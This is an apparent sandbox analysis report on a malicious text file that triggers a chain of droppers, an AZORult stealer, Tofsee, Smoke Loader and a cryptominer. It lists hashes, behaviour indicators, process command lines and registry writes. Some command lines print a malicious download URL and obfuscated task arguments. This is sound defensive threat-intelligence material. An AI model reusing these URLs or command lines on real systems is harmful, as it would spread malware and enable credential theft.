File name:

new 1.txt

Full analysis: https://app.any.run/tasks/a4a448bf-91e6-4ee2-adaf-13f1c1c2149e
Verdict: Malicious activity
Threats:

AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat.

Malware Trends Tracker     >>>
Analysis date: September 21, 2018, 20:19:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
installcapital
pup
startsurf
trojan
smoke
rat
azorult
tofsee
miner
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

F5082D8C4E7A019F1FE196ADF706B92E

SHA1:

092EB2C52742D238A5C3A877C960B3C715FB245D

SHA256:

BBD252309F21D92C79B23637F51AEAB309DBD4F0597474BE7E5BF067FCB814A7

SSDEEP:

12:4ZQVdIIxlqbUglg7vDdRPxIAoR2PMq4N6Rlg7vtTAmhUY3I65hSfCUIQv:4ARxlqbUJ7rdR582Eq4Nn7VcCUYL5hLG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Setup.exe (PID: 3952)
      • cb5dq992l6.exe (PID: 2672)
      • Setup.exe (PID: 904)
      • 47gdr.exe (PID: 1964)
      • 47gdr.exe (PID: 2792)
      • plfawdxcza.exe (PID: 2252)
      • cb5dq992l6.exe (PID: 892)
      • cb5dq992l6.exe (PID: 3468)
      • cb5dq992l6.exe (PID: 3972)
      • 33545175.exe (PID: 3420)
      • boisterous.exe (PID: 2756)
      • Scandal.exe (PID: 968)
      • Scandal.exe (PID: 3600)
      • Pana.exe (PID: 4004)
      • Pana.exe (PID: 1432)
      • parvez.exe (PID: 3596)
      • 43984.exe (PID: 736)
      • 112674.exe (PID: 2540)
      • parvez.exe (PID: 3744)
      • parvez.exe (PID: 3912)
      • parvez.exe (PID: 2728)
      • parvez.exe (PID: 1984)
      • parvez.exe (PID: 1464)
      • parvez.exe (PID: 1708)
      • parvez.exe (PID: 1744)
      • authenticating.exe (PID: 2200)
      • hart.exe (PID: 3332)
      • 89326.exe (PID: 1320)
      • reflective.exe (PID: 3660)
      • ns9753.tmp (PID: 2076)
      • ns8F62.tmp (PID: 2800)
      • ns955E.tmp (PID: 1496)
      • ns9D7D.tmp (PID: 3852)
      • chrome.exe (PID: 3964)
      • chrome.exe (PID: 2780)
      • chrome.exe (PID: 1356)
      • chrome.exe (PID: 3140)
      • chrome.exe (PID: 3516)
      • chrome.exe (PID: 1192)
      • chrome.exe (PID: 3984)
      • chrome.exe (PID: 772)
      • chrome.exe (PID: 3392)
      • chrome.exe (PID: 1692)
      • chrome.exe (PID: 3260)
      • cb5dq992l6.exe (PID: 2356)
      • chrome.exe (PID: 2604)
      • chrome.exe (PID: 2772)
      • chrome.exe (PID: 2904)
      • chrome.exe (PID: 2704)
      • chrome.exe (PID: 2460)
      • chrome.exe (PID: 3940)
      • chrome.exe (PID: 2308)
      • 26219.exe (PID: 2712)
      • chrome.exe (PID: 3584)
      • cb5dq992l6.exe (PID: 1540)
      • ic-0.bcfeafd66e26c8.exe (PID: 3336)
      • ic-0.20dea7be480c88.exe (PID: 2304)
      • ic-0.b16de7cb6ca1a8.exe (PID: 3868)
      • ic-0.20dea7be480c88.exe (PID: 3576)
      • ic-0.b16de7cb6ca1a8.exe (PID: 568)
      • Pana.exe (PID: 1796)
      • Pana.exe (PID: 1864)
      • Scandal.exe (PID: 2392)
      • Pana.exe (PID: 3480)
      • overcrowding.exe (PID: 3200)
      • overcrowding.exe (PID: 1696)
      • Scandal.exe (PID: 3320)
      • Scandal.exe (PID: 2752)
      • juleps.exe (PID: 3696)
      • Pana.exe (PID: 1152)
      • Scandal.exe (PID: 3652)
      • Pana.exe (PID: 3116)
      • Pana.exe (PID: 3844)
      • Pana.exe (PID: 3240)
      • juleps.exe (PID: 1728)
      • Scandal.exe (PID: 3120)
      • Scandal.exe (PID: 2264)
      • D1F3.tmp.exe (PID: 384)
      • ecjfenlc.exe (PID: 3104)
      • EF40.tmp.exe (PID: 884)
      • EF40.tmp.exe (PID: 3712)
      • Pana.exe (PID: 3624)
      • Scandal.exe (PID: 1460)
      • Pana.exe (PID: 2256)
      • Pana.exe (PID: 3208)
      • Scandal.exe (PID: 3876)
      • Pana.exe (PID: 1412)
      • Scandal.exe (PID: 3604)
      • juleps.exe (PID: 2244)
      • Pana.exe (PID: 544)
      • Pana.exe (PID: 2932)
      • Scandal.exe (PID: 316)
      • juleps.exe (PID: 3572)
      • Scandal.exe (PID: 2432)
      • Pana.exe (PID: 3040)

    • Connects to CnC server

      • Setup.exe (PID: 3952)
      • explorer.exe (PID: 1604)
      • EF40.tmp.exe (PID: 3712)
      • svchost.exe (PID: 2520)

    • Downloads executable files from the Internet

      • chrome.exe (PID: 2780)
      • Setup.exe (PID: 3952)
      • 47gdr.exe (PID: 2792)
      • explorer.exe (PID: 1604)

    • STARTSURF was detected

      • Setup.exe (PID: 3952)

    • Loads the Task Scheduler COM API

      • parvez.exe (PID: 3744)
      • parvez.exe (PID: 3596)
      • parvez.exe (PID: 3912)
      • parvez.exe (PID: 1984)
      • parvez.exe (PID: 2728)
      • parvez.exe (PID: 1464)
      • parvez.exe (PID: 1708)
      • parvez.exe (PID: 1744)
      • explorer.exe (PID: 1604)

    • Loads dropped or rewritten executable

      • parvez.exe (PID: 3596)
      • parvez.exe (PID: 3744)
      • parvez.exe (PID: 3912)
      • parvez.exe (PID: 1984)
      • parvez.exe (PID: 2728)
      • parvez.exe (PID: 1464)
      • parvez.exe (PID: 1744)
      • parvez.exe (PID: 1708)
      • 112674.exe (PID: 2540)
      • reflective.exe (PID: 3660)
      • hart.exe (PID: 3332)
      • 43984.exe (PID: 736)
      • ic-0.bcfeafd66e26c8.exe (PID: 3336)
      • overcrowding.exe (PID: 3200)
      • overcrowding.exe (PID: 1696)
      • EF40.tmp.exe (PID: 3712)

    • Writes to a start menu file

      • 33545175.exe (PID: 3420)
      • explorer.exe (PID: 1604)

    • Changes the autorun value in the registry

      • boisterous.exe (PID: 2756)
      • authenticating.exe (PID: 2200)

    • Loads the Task Scheduler DLL interface

      • ic-0.bcfeafd66e26c8.exe (PID: 3336)
      • MsiExec.exe (PID: 2224)

    • SMOKE was detected

      • explorer.exe (PID: 1604)

    • Changes settings of System certificates

      • Pana.exe (PID: 3844)

    • Downloads executable files from IP

      • explorer.exe (PID: 1604)

    • Uses SVCHOST.EXE for hidden code execution

      • ecjfenlc.exe (PID: 3104)
      • svchost.exe (PID: 3968)

    • AZORULT was detected

      • EF40.tmp.exe (PID: 3712)

    • Actions looks like stealing of personal data

      • EF40.tmp.exe (PID: 3712)

    • Looks like application has launched a miner

      • svchost.exe (PID: 3968)

    • MINER was detected

      • svchost.exe (PID: 2520)

    • TOFSEE was detected

      • svchost.exe (PID: 3968)

  • SUSPICIOUS

    • Reads internet explorer settings

      • Setup.exe (PID: 3952)
      • Pana.exe (PID: 1432)
      • Scandal.exe (PID: 3600)
      • Scandal.exe (PID: 968)
      • Pana.exe (PID: 4004)
      • Pana.exe (PID: 3844)
      • Scandal.exe (PID: 2752)
      • Pana.exe (PID: 3624)
      • Scandal.exe (PID: 1460)
      • Pana.exe (PID: 2256)
      • Pana.exe (PID: 3040)

    • Executable content was dropped or overwritten

      • chrome.exe (PID: 2780)
      • Setup.exe (PID: 3952)
      • plfawdxcza.exe (PID: 2252)
      • 47gdr.exe (PID: 2792)
      • 33545175.exe (PID: 3420)
      • 112674.exe (PID: 2540)
      • hart.exe (PID: 3332)
      • 43984.exe (PID: 736)
      • reflective.exe (PID: 3660)
      • ic-0.bcfeafd66e26c8.exe (PID: 3336)
      • ic-0.b16de7cb6ca1a8.exe (PID: 3868)
      • msiexec.exe (PID: 3796)
      • ic-0.b16de7cb6ca1a8.exe (PID: 568)
      • ic-0.b16de7cb6ca1a8.tmp (PID: 2504)
      • ic-0.b16de7cb6ca1a8.tmp (PID: 940)
      • overcrowding.exe (PID: 3200)
      • overcrowding.exe (PID: 1696)
      • explorer.exe (PID: 1604)
      • D1F3.tmp.exe (PID: 384)
      • cmd.exe (PID: 4016)
      • EF40.tmp.exe (PID: 3712)

    • Application launched itself

      • Setup.exe (PID: 904)
      • ic-0.20dea7be480c88.exe (PID: 2304)
      • EF40.tmp.exe (PID: 884)
      • svchost.exe (PID: 3968)

    • Creates files in the user directory

      • Setup.exe (PID: 3952)
      • 33545175.exe (PID: 3420)
      • Pana.exe (PID: 4004)
      • Pana.exe (PID: 1432)
      • Scandal.exe (PID: 3600)
      • ic-0.bcfeafd66e26c8.exe (PID: 3336)
      • MsiExec.exe (PID: 3792)
      • MsiExec.exe (PID: 2744)
      • explorer.exe (PID: 1604)
      • ic-0.b16de7cb6ca1a8.tmp (PID: 2504)
      • Pana.exe (PID: 3844)
      • Scandal.exe (PID: 1460)

    • Creates files in the program directory

      • 33545175.exe (PID: 3420)
      • reflective.exe (PID: 3660)

    • Changes IE settings (feature browser emulation)

      • boisterous.exe (PID: 2756)

    • Creates files in the Windows directory

      • 33545175.exe (PID: 3420)
      • cb5dq992l6.exe (PID: 2356)
      • MsiExec.exe (PID: 2224)
      • svchost.exe (PID: 3968)

    • Starts application with an unusual extension

      • hart.exe (PID: 3332)
      • reflective.exe (PID: 3660)

    • Uses TASKKILL.EXE to kill process

      • ns8F62.tmp (PID: 2800)
      • ns955E.tmp (PID: 1496)
      • ns9753.tmp (PID: 2076)
      • ns9D7D.tmp (PID: 3852)
      • MsiExec.exe (PID: 2744)

    • Reads Internet Cache Settings

      • explorer.exe (PID: 1604)
      • Pana.exe (PID: 4004)
      • Pana.exe (PID: 1432)
      • ic-0.bcfeafd66e26c8.exe (PID: 3336)

    • Reads Windows owner settings

      • ic-0.b16de7cb6ca1a8.tmp (PID: 940)
      • ic-0.b16de7cb6ca1a8.tmp (PID: 2504)

    • Starts Microsoft Installer

      • ic-0.bcfeafd66e26c8.exe (PID: 3336)

    • Reads the Windows organization settings

      • ic-0.b16de7cb6ca1a8.tmp (PID: 2504)
      • ic-0.b16de7cb6ca1a8.tmp (PID: 940)

    • Starts Internet Explorer

      • Setup.exe (PID: 3952)

    • Adds / modifies Windows certificates

      • Pana.exe (PID: 3844)

    • Starts CMD.EXE for commands execution

      • D1F3.tmp.exe (PID: 384)

    • Starts SC.EXE for service management

      • D1F3.tmp.exe (PID: 384)

    • Uses NETSH.EXE for network configuration

      • D1F3.tmp.exe (PID: 384)

    • Creates or modifies windows services

      • svchost.exe (PID: 3968)

    • Connects to unusual port

      • svchost.exe (PID: 3968)
      • svchost.exe (PID: 2520)

  • INFO

    • Application launched itself

      • chrome.exe (PID: 2780)
      • msiexec.exe (PID: 3796)
      • iexplore.exe (PID: 1992)

    • Reads Internet Cache Settings

      • chrome.exe (PID: 2780)

    • Loads dropped or rewritten executable

      • MsiExec.exe (PID: 3792)
      • ic-0.b16de7cb6ca1a8.tmp (PID: 940)
      • ic-0.b16de7cb6ca1a8.tmp (PID: 2504)
      • MsiExec.exe (PID: 2744)

    • Creates a software uninstall entry

      • msiexec.exe (PID: 3796)

    • Creates files in the program directory

      • msiexec.exe (PID: 3796)

    • Application was dropped or rewritten from another process

      • ic-0.b16de7cb6ca1a8.tmp (PID: 2504)
      • ic-0.b16de7cb6ca1a8.tmp (PID: 940)
      • FastDataX.exe (PID: 1416)

    • Changes internet zones settings

      • iexplore.exe (PID: 1992)

    • Creates files in the user directory

      • iexplore.exe (PID: 1704)

    • Dropped object may contain Bitcoin addresses

      • iexplore.exe (PID: 1704)

    • Reads internet explorer settings

      • iexplore.exe (PID: 1704)

    • Reads settings of System Certificates

      • Pana.exe (PID: 4004)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
180
Monitored processes
122
Malicious processes
33
Suspicious processes
8

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start notepad.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs setup.exe no specs #STARTSURF setup.exe plfawdxcza.exe cb5dq992l6.exe cb5dq992l6.exe 47gdr.exe 47gdr.exe cb5dq992l6.exe 33545175.exe cb5dq992l6.exe parvez.exe no specs parvez.exe no specs parvez.exe no specs boisterous.exe pana.exe scandal.exe 43984.exe parvez.exe no specs parvez.exe no specs pana.exe scandal.exe parvez.exe no specs parvez.exe no specs parvez.exe no specs 112674.exe authenticating.exe hart.exe 89326.exe no specs ns8f62.tmp no specs taskkill.exe no specs reflective.exe ns955e.tmp no specs taskkill.exe no specs ns9753.tmp no specs taskkill.exe no specs ns9d7d.tmp no specs taskkill.exe no specs cb5dq992l6.exe 26219.exe no specs cb5dq992l6.exe ic-0.bcfeafd66e26c8.exe msiexec.exe msiexec.exe msiexec.exe no specs msiexec.exe taskkill.exe no specs msiexec.exe no specs ic-0.20dea7be480c88.exe no specs ic-0.20dea7be480c88.exe no specs ic-0.b16de7cb6ca1a8.exe ic-0.b16de7cb6ca1a8.tmp ic-0.b16de7cb6ca1a8.exe ic-0.b16de7cb6ca1a8.tmp #SMOKE explorer.exe fastdatax.exe no specs iexplore.exe iexplore.exe pana.exe no specs scandal.exe no specs pana.exe no specs overcrowding.exe overcrowding.exe scandal.exe no specs pana.exe no specs scandal.exe juleps.exe no specs pana.exe no specs scandal.exe no specs pana.exe no specs pana.exe no specs scandal.exe no specs juleps.exe no specs scandal.exe no specs pana.exe d1f3.tmp.exe wusa.exe no specs wusa.exe cmd.exe cmd.exe sc.exe sc.exe sc.exe ecjfenlc.exe no specs #TOFSEE svchost.exe netsh.exe ef40.tmp.exe no specs #AZORULT ef40.tmp.exe scandal.exe pana.exe pana.exe scandal.exe no specs pana.exe no specs juleps.exe no specs pana.exe no specs pana.exe no specs scandal.exe no specs pana.exe no specs scandal.exe no specs juleps.exe no specs scandal.exe no specs pana.exe #MINER svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
316"C:\Program Files\Diluent\Scandal.exe" bjsabuwbjsabuwbjsabuwbjsabu.bjsabuhbjsabubbjsabuzbjsabu.bjsabupbjsabuwbjsabu/bjsabuek2s0s1s8sbjsabu0vn9vn2ek1bjsabueksaspwvvLbjsabu3b50TcJN5XbjsabuQOA7kZC:\Program Files\Diluent\Scandal.exetaskeng.exe
User:
admin
Integrity Level:
HIGH
Description:
Scandal
Exit code:
4294967295
Version:
2.4.5.139
Modules
Images
c:\program files\diluent\scandal.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
384C:\Users\admin\AppData\Local\Temp\D1F3.tmp.exeC:\Users\admin\AppData\Local\Temp\D1F3.tmp.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Driver Foundation - User-mode Driver Framework Host Process
Exit code:
0
Version:
10.0.17134.1 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\appdata\local\temp\d1f3.tmp.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\nddeapi.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
544"C:\Program Files\Diluent\Pana.exe" bjsabuwbjsabuwbjsabuwbjsabu.bjsabuhbjsabubbjsabuzbjsabu.bjsabupbjsabuwbjsabu/bjsabuek2s0s1s8sbjsabu0vn9vn2ek1bjsabueksaspwvvLbjsabu3b50TcJN5XbjsabuQOA7kZC:\Program Files\Diluent\Pana.exetaskeng.exe
User:
admin
Integrity Level:
HIGH
Description:
Pana
Exit code:
4294967295
Version:
7.6.5.62
Modules
Images
c:\program files\diluent\pana.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
568C:\Users\admin\AppData\Local\Temp\4678718\ic-0.b16de7cb6ca1a8.exe /VERYSILENT /SUPPRESSMSGBOXES /SL5=$E030E,1003091,121344,C:\Users\admin\AppData\Local\Temp\4678718\ic-0.b16de7cb6ca1a8.exeC:\Users\admin\AppData\Local\Temp\4678718\ic-0.b16de7cb6ca1a8.exe
ic-0.b16de7cb6ca1a8.tmp
User:
admin
Company:
Integrity Level:
HIGH
Description:
Exit code:
3
Version:
Modules
Images
c:\users\admin\appdata\local\temp\4678718\ic-0.b16de7cb6ca1a8.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
584"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\new 1.txtC:\Windows\system32\NOTEPAD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\notepad.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
736"C:\Users\admin\AppData\Local\Temp\nse7F25.tmp\43984.exe"C:\Users\admin\AppData\Local\Temp\nse7F25.tmp\43984.exe
33545175.exe
User:
admin
Integrity Level:
HIGH
Description:
43984
Exit code:
0
Version:
1.0.0.1
Modules
Images
c:\users\admin\appdata\local\temp\nse7f25.tmp\43984.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
772"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=888,799618075595438025,1058903108725231242,131072 --enable-features=PasswordImport --disable-gpu-compositing --service-pipe-token=6D0634B6CF51FB47BADAC7E12CAC8F9F --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=6D0634B6CF51FB47BADAC7E12CAC8F9F --renderer-client-id=13 --mojo-platform-channel-handle=4020 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\68.0.3440.106\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
884C:\Users\admin\AppData\Local\Temp\EF40.tmp.exeC:\Users\admin\AppData\Local\Temp\EF40.tmp.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\ef40.tmp.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imm32.dll
892C:\Users\admin\AppData\Local\Temp\nsv5C2C.tmp\cb5dq992l6.exe "http://www.hartalnorbury.pw/7?1dbfde1adh0100aae00=99993" "b33545175"C:\Users\admin\AppData\Local\Temp\nsv5C2C.tmp\cb5dq992l6.exe
plfawdxcza.exe
User:
admin
Integrity Level:
HIGH
Description:
operant
Exit code:
0
Version:
2.1.5.121
Modules
Images
c:\users\admin\appdata\local\temp\nsv5c2c.tmp\cb5dq992l6.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
904"C:\Users\admin\Downloads\Setup.exe" C:\Users\admin\Downloads\Setup.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\downloads\setup.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\acgenral.dll
Total events
8 836
Read events
7 691
Write events
1 106
Delete events
39

Modification events

(PID) Process:(1604) explorer.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0
Operation:writeName:CheckSetting
Value:
01000000D08C9DDF0115D1118C7A00C04FC297EB010000006821FD290F362A42A685E6961EA74BA800000000020000000000106600000001000020000000163536906574D226133820C7C6B6632848EEFCBE12FBBEB0708548F325D77BFE000000000E80000000020000200000001D9FC6D2EC07C267B46F75D5563EF118615BDF7FC71D4542A0443DB6F46C3B81300000004BC6CBCE9A1BFC5F369784044A920028E5608DB1ACA433EE85811179DE6C9670B8707AB380B84BD61DD36138DD2F84C2400000008069E0AEDEF0DDF478C9DF3D8A2FD44B860635203B37B2E4B3D0D5B4B56F0E4DDCDD52F45AA6540DE8F2ECC3366F1BED8175BD702610F1E0F7C83DF90795F5EF
(PID) Process:(2780) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(2780) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
2
(PID) Process:(2780) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
1
(PID) Process:(2780) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
Operation:writeName:dr
Value:
1
(PID) Process:(3140) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes
Operation:writeName:2780-13182034779036750
Value:
259
(PID) Process:(1604) explorer.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Operation:writeName:Puebzr
Value:
000000000200000001000000F5470000000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BFFFFFFFFFC05F3B6CE851D40100000000
(PID) Process:(1604) explorer.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Operation:writeName:HRZR_PGYFRFFVBA
Value:
00000000110000001F000000C89C0A000300000007000000E38F02007B00460033003800420046003400300034002D0031004400340033002D0034003200460032002D0039003300300035002D003600370044004500300042003200380046004300320033007D005C006500780070006C006F007200650072002E006500780065000000000000005CE72802FFFFFFFF78173700FFFFFFFF90497D750000000000000000F8E62802D574797500040000000000005CE72802FFFFFFFF78173700FFFFFFFF00E1360018E236007017370028E728022FB1907580B0C37568F42802381E917514639175F01535005CE7280200000000700000008F51EA7A3CE72802BE6A9175F01535005CE728020000000068E928026F629175F01535005CE7280200000400000000807C629175F015350063003A005C00750073006500720073005C00610064006D0069006E005C0061007000700064006100740061005C0072006F0061006D0069006E0067005C006D0011000000F0443500E8443500660074005C00690020E800001F51EA7AD0E728028291917520E828028CD800006B51EA7AE4E72802B69C917590D8D4034C060000FCE7280200D4D40308E82802789C917511000000F0443500E8443500A8E82802A4E8280220D4D40374E80000AB5EEA7A24E828028291917574E8280228E8280227959175000000008CD8D40350E82802CD9491758CD8D403FCE8280200D4D403E19491750000000000D4D403FCE8280258E82802000000000B00000000F203007B00440036003500320033003100420030002D0042003200460031002D0034003800350037002D0041003400430045002D004100380045003700430036004500410037004400320037007D005C007400610073006B006D00670072002E0065007800650000000000B8E9280284E82802A532EB76C4E828029CE9280200000000B432EB76FCE928020145EB766A00E3028C00E302B8ACE30280E728020001000101000000000100000000000028FCC102D0E92802E0E2D802ACE92802CAFED802A8E72802DCE928026000E3022B0000006A00E30228FCC102000000008C00E30264E928020A00E3020000000005000500A82355026601E3022B0000000F000000FCE92802C4E9280228FCC1021000000074FFC102050017004E1E5502C4E828021600000002000000B8ACE3020400280228FCC102030000000000000009090900090909090009111100000000000000000000000011000000F0443500E84435000000000000000000000000000000000024E800006751EA7AD8E728028291917524E828028CD800007351EA7AECE72802B69C917590D8D4034C06000004E8280200D4D40311000000F0443500E844350040B0C37504E8280220D4D40374E80000AB5EEA7A24E828028291917574E8280228E8280227959175000000008CD8D40350E82802CD9491758CD8D403FCE8280200D4D403E19491750000000000D4D403FCE8280258E82802000000000B00000000F203007B00440036003500320033003100420030002D0042003200460031002D0034003800350037002D0041003400430045002D004100380045003700430036004500410037004400320037007D005C007400610073006B006D00670072002E0065007800650000000000B8E9280284E82802A532EB76C4E828029CE9280200000000B432EB76FCE928020145EB766A00E3028C00E302B8ACE30280E728020001000101000000000100000000000028FCC102D0E92802E0E2D802ACE92802CAFED802A8E72802DCE928026000E3022B0000006A00E30228FCC102000000008C00E30264E928020A00E3020000000005000500A82355026601E3022B0000000F000000FCE92802C4E9280228FCC1021000000074FFC102050017004E1E5502C4E828021600000002000000B8ACE3020400280228FCC102030000000000000009090900090909090009111100000000000000000000000011000000F0443500E84435000000000000000000000000000000000024E800006751EA7AD8E728028291917524E828028CD800007351EA7AECE72802B69C917590D8D4034C06000004E8280200D4D40311000000F0443500E844350040B0C37504E8280220D4D40374E80000AB5EEA7A24E828028291917574E8280228E8280227959175000000008CD8D40350E82802CD9491758CD8D403FCE8280200D4D403E19491750000000000D4D403FCE8280258E82802
(PID) Process:(1604) explorer.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count
Operation:writeName:{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Tbbtyr Puebzr.yax
Value:
00000000010000000000000000000000000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BF000080BFFFFFFFFFC05F3B6CE851D40100000000
(PID) Process:(1604) explorer.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count
Operation:writeName:HRZR_PGYFRFFVBA
Value:
000000000E000000000000000D00000003000000000000000300000043003A005C00550073006500720073005C005000750062006C00690063005C004400650073006B0074006F0070005C004100630072006F0062006100740020005200650061006400650072002000440043002E006C006E006B0000006C006E006B000000630072006F0062006100740020005200650061006400650072002000440043005C005200650061006400650072005C004100630072006F0052006400330032002E00650078006500000013060000000085F990753C53660678D4130650D413063853660684D41306546F9D76BC66AC760000000024D913066C31917524D91306553E917573FC6A06E4DB130600000000813E91754CD9130650D91306385366060DFB6A0612DC13060000000073FC6A06740A91750000000000000000000000000000000000000000000000000000000000000000FFFFFFFF000000000000000000000000713AE403873AE403713AE4030000000000000000000000000000000000000000000000000000000000000000922400007B5C580344D5130633AB47777B88AFEFFC0B00001027000008000000ED53020078D51306F8AA4777ED5302007B5C580398D51306E8DED40318D6130600000000A2010000D8D50000D763D17E88D5130682919175D8D513068CD51306279591750000000074E3D403B4D51306CD94917574E3D40360D61306E8DED403E194917500000000E8DED40360D61306BCD5130603000000000000000300000043003A005C00550073006500720073005C005000750062006C00690063005